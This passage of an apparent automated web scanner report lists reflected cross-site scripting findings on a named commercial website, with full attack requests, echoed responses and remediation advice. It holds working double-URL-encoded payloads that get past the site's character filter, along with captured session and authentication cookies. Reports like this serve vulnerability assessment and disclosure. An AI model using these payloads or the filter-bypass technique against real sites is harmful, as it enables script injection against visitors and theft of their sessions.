Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:23 GMT
Content-Length: 28971
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content6f3c9";alert(1)//171a6932c4f/sigma-aldrich/the-americas/united-states/promotional-offers","E404") ;
   </script>
...[SNIP]...

1.243. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/promotional-offers [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/promotional-offers

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d3ed%2522%253balert%25281%2529%252f%252f542fb904e78 was submitted in the REST URL parameter 2. This input was echoed as 9d3ed";alert(1)//542fb904e78 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich9d3ed%2522%253balert%25281%2529%252f%252f542fb904e78/the-americas/united-states/promotional-offers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:25 GMT
Content-Length: 28971
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich9d3ed";alert(1)//542fb904e78/the-americas/united-states/promotional-offers","E404") ;
   </script>
...[SNIP]...

1.244. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/promotional-offers [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/promotional-offers

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f223%2522%253balert%25281%2529%252f%252f9aee3a45215 was submitted in the REST URL parameter 3. This input was echoed as 8f223";alert(1)//9aee3a45215 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/the-americas8f223%2522%253balert%25281%2529%252f%252f9aee3a45215/united-states/promotional-offers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:26 GMT
Content-Length: 28971
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/the-americas8f223";alert(1)//9aee3a45215/united-states/promotional-offers","E404") ;
   </script>
...[SNIP]...

1.245. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/promotional-offers [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/promotional-offers

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c161%2522%253balert%25281%2529%252f%252f253a861f702 was submitted in the REST URL parameter 4. This input was echoed as 8c161";alert(1)//253a861f702 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/the-americas/united-states8c161%2522%253balert%25281%2529%252f%252f253a861f702/promotional-offers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:28 GMT
Content-Length: 28971
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/the-americas/united-states8c161";alert(1)//253a861f702/promotional-offers","E404") ;
   </script>
...[SNIP]...

1.246. http://www.sigmaaldrich.com/content/sigma-aldrich/the-americas/united-states/promotional-offers [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/the-americas/united-states/promotional-offers

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2605%2522%253balert%25281%2529%252f%252fd1711f2b49f was submitted in the REST URL parameter 5. This input was echoed as f2605";alert(1)//d1711f2b49f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/the-americas/united-states/promotional-offersf2605%2522%253balert%25281%2529%252f%252fd1711f2b49f HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:30 GMT
Content-Length: 28971
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/the-americas/united-states/promotional-offersf2605";alert(1)//d1711f2b49f","E404") ;
   </script>
...[SNIP]...

1.247. http://www.sigmaaldrich.com/customer-service/services.flagdisplay.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /customer-service/services.flagdisplay.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8eb43%2522%253balert%25281%2529%252f%252fdb39faf8c5b was submitted in the REST URL parameter 1. This input was echoed as 8eb43";alert(1)//db39faf8c5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /customer-service8eb43%2522%253balert%25281%2529%252f%252fdb39faf8c5b/services.flagdisplay.js?id=1289930503318 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/customer-service/services.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
